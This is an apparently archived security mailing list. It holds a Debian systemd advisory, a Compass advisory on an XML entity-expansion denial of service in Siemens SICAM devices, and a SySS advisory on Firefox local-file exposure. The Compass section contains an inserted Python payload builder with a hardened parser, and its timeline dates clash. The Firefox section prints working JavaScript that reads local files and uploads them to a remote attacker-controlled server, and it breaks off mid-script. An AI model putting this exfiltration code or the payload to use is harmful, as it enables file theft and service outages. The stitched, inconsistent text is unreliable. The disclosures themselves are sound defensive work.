[SECURITY] [DSA 4367-2] systemd regression update

2019-01-16 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

--------------------------------------------------------------------------
Debian Security Advisory DSA-4367-2   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
January 15, 2019  https://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: systemd

The Qualys Research Labs reported that the backported security fixes
shipped in DSA 4367-1 contained a memory leak in systemd-journald. This
and an unrelated bug in systemd-coredump are corrected in this update.

Note that, as the systemd-journald service is not restarted automatically
on upgrade, a restart of the service (or, more safely, a reboot) is advised.

For the stable distribution (stretch), these problems have been fixed in
version 232-25+deb9u8.

We recommend that you upgrade your systemd packages.

For the detailed security status of systemd please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/systemd

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



CVE-2018-13798 Siemens - SICAM A8000 Series Webinterface XXE DoS

2019-01-16 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  SICAM A8000 Series
# Vendor:   Siemens
# CSNC ID:  CSNC-2019-002
# CVE ID:   CVE-2018-13798
# Subject:  SICAM Webinterface XXE DoS
# Risk: Medium (CVSS 3.0 Base Score: 5.3)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C
# Effect:   Unauthenticated remotely exploitable
# Authors:  Emanuel Duss 
#   Nicolas Heiniger 
# Date: 2019-01-14
#
#

Introduction
------------

The Siemens SICAM A8000 RTU (Remote Terminal Unit) series is a modular device
range for telecontrol and automation applications in all areas of energy
supply. This device offers a web management interface for performing simple
management tasks.

During a penetration test, Compass found a denial-of-service vulnerability in
the Siemens SICAM web server. The web management interface is vulnerable to
the "billion laughs" attack [2], in which nested XML entity definitions
expand exponentially when the parser resolves them. Successful exploitation
is possible unauthenticated over the network.

Affected
--------

* SICAM A8000 CP-8000 < V14
* SICAM A8000 CP-802X < V14
* SICAM A8000 CP-8050 < V2.00

Technical Description
---------------------

When a login on the web management interface is performed, the following
request is sent to the server:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42
Content-Type: application/xml
Content-Length: 118
Connection: close

[XML login request body not preserved in this archive copy]


By modifying the XML message, it's possible to perform a billion laughs denial
of service attack against the web management interface:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42/
Content-Type: application/xml
Content-Length: 1679
Connection: close


[XML request body not preserved in this archive copy: a DOCTYPE internal
subset with the nested entity declarations, closed by "]>"]


The XML parser on the device expands the nested entity references. Because
each entity refers to the previous one many times, the expanded text grows
exponentially with the nesting depth; this consumes all available memory and
the web management interface no longer responds.

If the web management interface is refreshed in the browser, the following
message appears:

The device is currently unreachable. Retrying to connect.

Other services on the device, such as the one used by ToolboxII to configure
the device and the IEC 60870-5-104 (IEC104) service, keep working and are not
affected by this attack. Only the web management interface remains unusable
until the device is rebooted.

It is not possible to use an external entity (the SYSTEM keyword) to read
local or remote files, so the impact is limited to availability.
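An added example, not code from Compass or Siemens, showing both halves of
the problem with Python's standard-library expat parser: a small constructed
billion-laughs document (three levels of ten, so 3 kB of expansion rather
than the classic 3 GB) that a default parser expands in full, and a hardened
parse that refuses any DOCTYPE before the first entity is declared, which
blocks both the internal-entity expansion used here and the SYSTEM
external-entity case the advisory tested. The element and entity names are
made up.

```python
"""Entity-expansion ("billion laughs") demonstration and a hardened parser.

Added example, not code from Compass or Siemens. Standard library only
(xml.parsers.expat). The document built here is a constructed, deliberately
small variant of the attack: DEPTH nesting levels with FANOUT references
each, so the parser materialises len(LEAF) * FANOUT**DEPTH bytes of text.
With DEPTH=9 that is the 3 GB classic; DEPTH=3 keeps it to 3 kB.
"""
import xml.parsers.expat

LEAF = "lol"
FANOUT = 10
DEPTH = 3


def build_laughs(depth=DEPTH, fanout=FANOUT, leaf=LEAF):
    """Constructed sample payload: e0 is the leaf text, each e<n> references
    e<n-1> `fanout` times, and the root element references the outermost."""
    decls = ['<!ENTITY e0 "%s">' % leaf]
    for level in range(1, depth + 1):
        decls.append('<!ENTITY e%d "%s">' % (level, "&e%d;" % (level - 1) * fanout))
    return ('<?xml version="1.0"?>\n<!DOCTYPE auth [\n%s\n]>\n<auth>&e%d;</auth>'
            % ("\n".join(decls), depth))


def expanded_size(depth=DEPTH, fanout=FANOUT, leaf=LEAF):
    """Bytes of character data the parser must produce for build_laughs()."""
    return len(leaf) * fanout ** depth


def naive_char_count(doc):
    """Parse with default settings, as the device evidently does, and return
    how many bytes of character data the entity expansion produced."""
    total = [0]

    def on_chars(data):
        total[0] += len(data)

    parser = xml.parsers.expat.ParserCreate()
    parser.CharacterDataHandler = on_chars
    parser.Parse(doc, True)
    return total[0]


class UnsafeXML(ValueError):
    """Raised when a document carries a DOCTYPE or an entity declaration."""


def parse_hardened(doc):
    """Parse an XML document that must not contain a DTD; returns the root
    element name. Rejecting the DOCTYPE up front means no entity is ever
    declared, so nothing can be expanded, internal or external."""

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE not allowed (root %r)" % name)

    def reject_entity(name, *rest):
        raise UnsafeXML("entity declaration not allowed (%r)" % name)

    root = []

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity  # belt and braces
    parser.StartElementHandler = on_start
    parser.Parse(doc, True)  # exceptions raised in handlers propagate here
    return root[0]


if __name__ == "__main__":
    payload = build_laughs()
    print("payload is %d bytes, expands to %d bytes of text"
          % (len(payload), naive_char_count(payload)))
    print("depth 9 would expand to %d bytes" % expanded_size(depth=9))
    try:
        parse_hardened(payload)
    except UnsafeXML as e:
        print("hardened parser refused it:", e)
```

Refusing the DOCTYPE outright is the right fix for an endpoint such as
/sicweb-ajax/auth, which has no legitimate need for a DTD; capping the
expansion depth or amplification is the weaker choice, since the parser
still does all the work up to the cap. Expat 2.4 and later also limit entity
amplification by default, but that limit only engages once the expanded
output passes a threshold of several megabytes, so it is not a substitute.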

Vulnerability Classification
----------------------------

* CVSS v3.0 Base Score: 5.3
* CVSS v3.0 Vector: 
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C

Remediation
-----------

* SICAM A8000 CP-8000: Update to V14
* SICAM A8000 CP-802X: Update to V14
* SICAM A8000 CP-8050: Update to V2.00 or higher

Please see the Siemens advisory [3] for the download links.

As a workaround, access to the web server on ports 80/tcp and 443/tcp can be
restricted to trusted management hosts with a firewall.

Acknowledgments
---------------

We thank Siemens for the coordinated disclosure.

Timeline
--------

2018-05-28: Vulnerability discovered by Emanuel Duss and Nicolas Heiniger
2018-05-28: Informed customer
2018-06-06: Initial vendor notification
2018-03-18: Vendor informed us that they will publish an advisory
2019-01-08: Siemens published advisory [3]
2019-01-11: Compass published advisory containing technical information

References
----------

[1] https://w3.siemens.com/smartgrid/global/en/products-systems-solutions/substation-automation/substation-automation/pages/sicam-a8000.aspx
[2] https://www.owasp.org/index.php/XML_Security_Cheat_Sheet#Billion_Laughs
[3] https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt


[SYSS-2018-041] Mozilla Firefox - Information Exposure

2019-01-16 Thread vladimir . bostanov
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2018-041
Product: Firefox
Manufacturer: Mozilla
Affected Versions: <= 64
Tested Versions: 61, 62, 63, 64
Vulnerability Type: Information Exposure (CWE-200)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2018-07-19
Solution Date: -
Public Disclosure: 2019-01-16
CVE Reference: Not yet assigned
Author of Advisory: Dr. Vladimir Bostanov, SySS GmbH

~~~

Overview:

Mozilla Firefox is a web browser available for various platforms including
Windows, Linux, Mac, Android, and iOS [1]. It is one of the most popular
web browsers according to StatCounter [2].

An overly liberal same-origin policy for file URIs and a bug in the
implementation of this policy make Firefox vulnerable to exposure of local
files to a remote attacker.

~~~

Vulnerability Details:

Firefox's same-origin policy for file URIs allows local files to read
other files in the same directory but not the directory index [3]. For
example, a file with the URI file:///home/joe/Downloads/aFile.html can read
file:///home/joe/Downloads/anotherFile.html, but it should not be able to
read file:///home/joe/Downloads/. We discovered, however, a violation of
this policy in the special case when a user first opens a local directory,
e.g., file:///home/joe/Downloads/, in the browser and from there navigates
to a file in this directory, e.g., file:///home/joe/Downloads/aFile.html.
In this case, aFile.html can read the Downloads directory index. This
allows a malicious script in aFile.html to read all files in this
directory by referring to each of them by its respective filename, and to
send all the data to a remote server controlled by the attacker.

The following attack scenario seems plausible. A user saves an HTML file in
the Downloads folder. The victim user might have received the file by
email; or downloaded it from a malicious website offering, e.g., free
eBooks or picture albums; or downloaded it from a corporate website
where a malicious employee had uploaded it. The victim clicks on the
filename in the file manager. The file is opened with the default Firefox
browser. The victim is presented with a directory index and a message
explaining that the file is "protected" and the user should open it in
"safe mode" by clicking on the link in the directory index. The victim
clicks again on the filename, this time in the browser's directory
listing. The contents of the HTML document are displayed. In the
background, the malicious JavaScript reads, first, the directory index,
then the contents of each file in the Downloads directory, and sends all
these data to a website controlled by the attacker.

~~~

Proof of Concept (PoC):

We offer a test website [5] where a user can check if a browser is
vulnerable to evilXHR. The above scenario is implemented by the following
HTML file evilXHR.html:

<title>evilXHR</title>
<script src="https://ptvb.sy.gs/evilXHR/base64ArrayBuffer.js"></script>
<script>
// The script will be called from this HTML file:
var htmlName = 'evilXHR.html';

// Files will be uploaded to this site:
var siteURL = 'https://ptvb.sy.gs/evilXHR/';
var phpURL = siteURL + 'upload.php';

var cType = 'application/x-www-form-urlencoded';
var guID = Date.now() + Math.random().toString().substr(3,8);
var uploadPathURL = siteURL + 'Uploads/' + guID;
//---
function singleFileEvilXHR(fName)
  {
  var xGetFile = new XMLHttpRequest();
  xGetFile.onreadystatechange = function()
{
if (this.readyState == 4)
  {
  var xPostFile = new XMLHttpRequest();
  xPostFile.open('POST', phpURL);
  var fURL = encodeURIComponent(this.responseURL);
  var fData = encodeURIComponent(base64ArrayBuffer(this.response));
  xPostFile.setRequestHeader('Content-Type', cType);
  xPostFile.send('guID='+guID + '&fURL='+fURL + '&fData='+fData);
  }
}
  xGetFile.open('GET', fName);
  xGetFile.responseType = 'arraybuffer';
  xGetFile.send();
  }
//---
function allFilesEvilXHR()
  {
  var xGetDir = new XMLHttpRequest();
  xGetDir.onreadystatechange = function()
{
if (this.readyState == 4)
  {
  var xPostDir = new XMLHttpRequest();
  xPostDir.open('POST', phpURL);
  var dData = encodeURIComponent(this.response);
  xPostDir.setRequestHeader('Content-Type', cType);
  xPostDir.send('guID=' + guID + '&dData=' + dData);
  var dirIndex = this.response.split('\n');
  for (var n = 2; n < dirIndex.length-1; n++)
{
var dirIndexEntry = dirIndex[n].split(' ');
if (dirIndexEntry[4] == 'FILE' && dirIndexEntry[1] != htmlName)
  {
  singleFileEvilXHR(dirIndexEntry[1]);
  }
}
  }
}